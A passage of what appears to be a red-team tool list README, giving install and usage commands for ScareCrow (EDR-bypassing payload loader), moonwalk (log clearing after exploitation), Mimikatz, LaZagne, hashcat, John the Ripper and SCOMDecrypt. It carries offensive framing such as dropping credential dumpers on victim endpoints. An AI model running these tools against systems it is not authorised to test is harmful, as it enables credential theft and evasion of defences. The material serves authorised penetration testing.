runtime/request so that no generated output share the same signatures.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eNice f-secure blog explaining AMSI \u003ca href=\"https://blog.f-secure.com/hunting-for-amsi-bypasses/\" rel=\"nofollow\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/217655078-919e9c98-4c78-4c2b-a695-3e1c4d3f1e65.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/217655078-919e9c98-4c78-4c2b-a695-3e1c4d3f1e65.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"http://amsi.fail/\" rel=\"nofollow\"\u003ehttp://amsi.fail/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/optiv/ScareCrow\"\u003eScareCrow\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-scarecrow\" class=\"anchor\" aria-label=\"Permalink: 🔙ScareCrow\" href=\"#scarecrow\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eScareCrow is a payload creation framework for side loading (not injecting) into a legitimate Windows process (bypassing Application Whitelisting controls).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eOnce the DLL loader is loaded into memory, it utilizes a technique to flush an EDR’s hook out of the system DLLs running in the process's memory.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eWhen executed, ScareCrow will copy the bytes of the system DLLs stored on disk in \u003ccode\u003eC:\\Windows\\System32\\\u003c/code\u003e. These DLLs are stored on disk “clean” of EDR hooks because they are used by the system to load an unaltered copy into a new process when it’s spawned. Since EDR’s only hook these processes in memory, they remain unaltered.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eNice blogs for learning about techniques utilized by ScareCrow:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003e\u003ca href=\"https://www.optiv.com/explore-optiv-insights/source-zero/endpoint-detection-and-response-how-hackers-have-evolved\" rel=\"nofollow\"\u003eEndpoint Detection and Response: How Hackers Have Evolved\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.optiv.com/explore-optiv-insights/source-zero/edr-and-blending-how-attackers-avoid-getting-caught\" rel=\"nofollow\"\u003eEDR and Blending In: How Attackers Avoid Getting Caught\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eScareCrow requires golang 1.16.1 or later to compile loaders.\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Clone\ngit clone https://github.com/optiv/ScareCrow\ncd ScareCrow\n\n# Install dependencies\ngo get github.com/fatih/color\ngo get github.com/yeka/zip\ngo get github.com/josephspurrier/goversioninfo\n\n# Required\nopenssl\nosslsigncode\nmingw-w64\n\n# Build\ngo build ScareCrow.go\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Clone\u003c/span\u003e\ngit clone https://github.com/optiv/ScareCrow\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e ScareCrow\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Install dependencies\u003c/span\u003e\ngo get github.com/fatih/color\ngo get github.com/yeka/zip\ngo get github.com/josephspurrier/goversioninfo\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Required\u003c/span\u003e\nopenssl\nosslsigncode\nmingw-w64\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Build\u003c/span\u003e\ngo build ScareCrow.go\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"Usage of ./ScareCrow:\n -I string\n Path to the raw 64-bit shellcode.\n -Loader string\n Sets the type of process that will sideload the malicious payload:\n [*] binary - Generates a binary based payload. (This type does not benefit from any sideloading)\n [*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated.\n [*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.\n [*] excel - Loads into a hidden Excel process using a JScript loader.\n [*] msiexec - Loads into MSIexec process using a JScript loader.\n [*] wscript - Loads into WScript process using a JScript loader. (default \u0026quot;binary\u0026quot;)\n -O string\n Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.\n -configfile string\n The path to a json based configuration file to generate custom file attributes. This will not use the default ones.\n -console\n Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.\n...\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003eUsage of ./ScareCrow:\n -I string\n Path to the raw 64-bit shellcode.\n -Loader string\n Sets the type of process that will sideload the malicious payload:\n [*] binary - Generates a binary based payload. (This type does not benefit from any sideloading)\n [*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated.\n [*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.\n [*] excel - Loads into a hidden Excel process using a JScript loader.\n [*] msiexec - Loads into MSIexec process using a JScript loader.\n [*] wscript - Loads into WScript process using a JScript loader. (default \"binary\")\n -O string\n Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.\n -configfile string\n The path to a json based configuration file to generate custom file attributes. This will not use the default ones.\n -console\n Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.\n...\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage information can be found \u003ca href=\"https://github.com/optiv/ScareCrow#loader\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/220959052-029eac69-0b38-40d5-bc1a-7e90b0c93726.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/220959052-029eac69-0b38-40d5-bc1a-7e90b0c93726.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/optiv/ScareCrow\"\u003ehttps://github.com/optiv/ScareCrow\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/mufeedvh/moonwalk\"\u003emoonwalk\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-moonwalk\" class=\"anchor\" aria-label=\"Permalink: 🔙moonwalk\" href=\"#moonwalk\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003emoonwalk is a 400 KB single-binary executable that can clear your traces while penetration testing a Unix machine.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt saves the state of system logs pre-exploitation and reverts that state including the filesystem timestamps post-exploitation leaving zero traces of a ghost in the shell.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk\"\u003e\u003cpre\u003ecurl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Start moonwalk straight after getting a shell on the victim Linux endpoint\ncurl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk\nchmod +x moonwalk\nmoonwalk start\n\n# Once you are finished, clear your traces \nmoonwalk finish\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Start moonwalk straight after getting a shell on the victim Linux endpoint\u003c/span\u003e\ncurl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk\nchmod +x moonwalk\nmoonwalk start\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Once you are finished, clear your traces \u003c/span\u003e\nmoonwalk finish\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/220959174-9c72922f-40cc-4843-bdc8-353cc55a3c51.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/220959174-9c72922f-40cc-4843-bdc8-353cc55a3c51.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/mufeedvh/moonwalk\"\u003ehttps://github.com/mufeedvh/moonwalk\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eCredential Access\u003c/h1\u003e\u003ca id=\"user-content-credential-access\" class=\"anchor\" aria-label=\"Permalink: Credential Access\" href=\"#credential-access\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/gentilkiwi/mimikatz\"\u003eMimikatz\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-mimikatz\" class=\"anchor\" aria-label=\"Permalink: 🔙Mimikatz\" href=\"#mimikatz\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eGreat tool for gaining access to hashed and cleartext passwords on a victims endpoint. Once you have gained privileged access to a system, drop this tool to collect some creds.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003col dir=\"auto\"\u003e\n\u003cli\u003eDownload the \u003ca href=\"https://github.com/gentilkiwi/mimikatz/releases\"\u003emimikatz_trunk.7z\u003c/a\u003e file.\u003c/li\u003e\n\u003cli\u003eOnce downloaded, the \u003ccode\u003emimikatz.exe\u003c/code\u003e binary is in the \u003ccode\u003ex64\u003c/code\u003e folder.\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\".\\mimikatz.exe\nprivilege::debug\"\u003e\u003cpre\u003e.\u003cspan class=\"pl-cce\"\u003e\\m\u003c/span\u003eimikatz.exe\nprivilege::debug\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/208253562-5c58d412-ed3e-4ab5-b8e7-11092852c3d0.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/208253562-5c58d412-ed3e-4ab5-b8e7-11092852c3d0.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/AlessandroZ/LaZagne\"\u003eLaZagne\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-lazagne\" class=\"anchor\" aria-label=\"Permalink: 🔙LaZagne\" href=\"#lazagne\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eNice tool for extracting locally stored passwords from browsers, databases, games, mail, git, wifi, etc.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Binary)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou can install the standalone binary from \u003ca href=\"https://github.com/AlessandroZ/LaZagne/releases/\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Launch all modes\n.\\laZagne.exe all\n\n# Launch only a specific module\n.\\laZagne.exe browsers\n\n# Launch only a specific software script\n.\\laZagne.exe browsers -firefox\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Launch all modes\u003c/span\u003e\n.\u003cspan class=\"pl-cce\"\u003e\\l\u003c/span\u003eaZagne.exe all\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Launch only a specific module\u003c/span\u003e\n.\u003cspan class=\"pl-cce\"\u003e\\l\u003c/span\u003eaZagne.exe browsers\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Launch only a specific software script\u003c/span\u003e\n.\u003cspan class=\"pl-cce\"\u003e\\l\u003c/span\u003eaZagne.exe browsers -firefox\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/208253800-48f960db-d569-4d1a-b39f-d6c7643691e2.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/208253800-48f960db-d569-4d1a-b39f-d6c7643691e2.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/hashcat/hashcat\"\u003ehashcat\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-hashcat\" class=\"anchor\" aria-label=\"Permalink: 🔙hashcat\" href=\"#hashcat\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eTool for cracking password hashes. Supports a large list of hashing algorithms (Full list can be found \u003ca href=\"https://hashcat.net/wiki/doku.php?id=example_hashes\" rel=\"nofollow\"\u003ehere\u003c/a\u003e).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: Binary\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou can install the standalone binary from \u003ca href=\"https://hashcat.net/hashcat/\" rel=\"nofollow\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\".\\hashcat.exe --help\"\u003e\u003cpre\u003e.\u003cspan class=\"pl-cce\"\u003e\\h\u003c/span\u003eashcat.exe --help\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eNice hashcat command \u003ca href=\"https://cheatsheet.haax.fr/passcracking-hashfiles/hashcat_cheatsheet/\" rel=\"nofollow\"\u003echeatsheet\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/208263419-94bf92c0-1c83-4366-a6c2-b6533fdcc521.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/208263419-94bf92c0-1c83-4366-a6c2-b6533fdcc521.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/openwall/john\"\u003eJohn the Ripper\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-john-the-ripper\" class=\"anchor\" aria-label=\"Permalink: 🔙John the Ripper\" href=\"#john-the-ripper\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eAnother password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs and GPUs.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo apt-get install john -y\"\u003e\u003cpre\u003esudo apt-get install john -y\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"john\"\u003e\u003cpre\u003ejohn\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/208263690-8c2d1253-7261-47da-850d-ca5a8d98ca13.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/208263690-8c2d1253-7261-47da-850d-ca5a8d98ca13.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/nccgroup/SCOMDecrypt\"\u003eSCOMDecrypt\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-scomdecrypt\" class=\"anchor\" aria-label=\"Permalink: 🔙SCOMDecrypt\" href=\"#scomdecrypt\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThis tool is designed to retrieve and decrypt RunAs credentials stored within Microsoft System Center Operations Manager (SCOM) databases.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eNCC blog post - \u003ca href=\"https://research.nccgroup.com/2017/02/23/scomplicated-decrypting-scom-runas-credentials/\" rel=\"nofollow\"\u003e'SCOMplicated? – Decrypting SCOM “RunAs” credentials'\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003ePre-requisites:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eTo run the tool you will require administrative privileges on the SCOM server. You will also need to ensure that you have read access to the following registry key:\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\System Center\\2010\\Common\\MOMBins\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003eHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\System Center\\2010\\Common\\MOMBins\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eYou can check manually that you can see the database by gathering the connection details from the following keys:\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\System Center\\2010\\Common\\Database\\DatabaseServerName\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\System 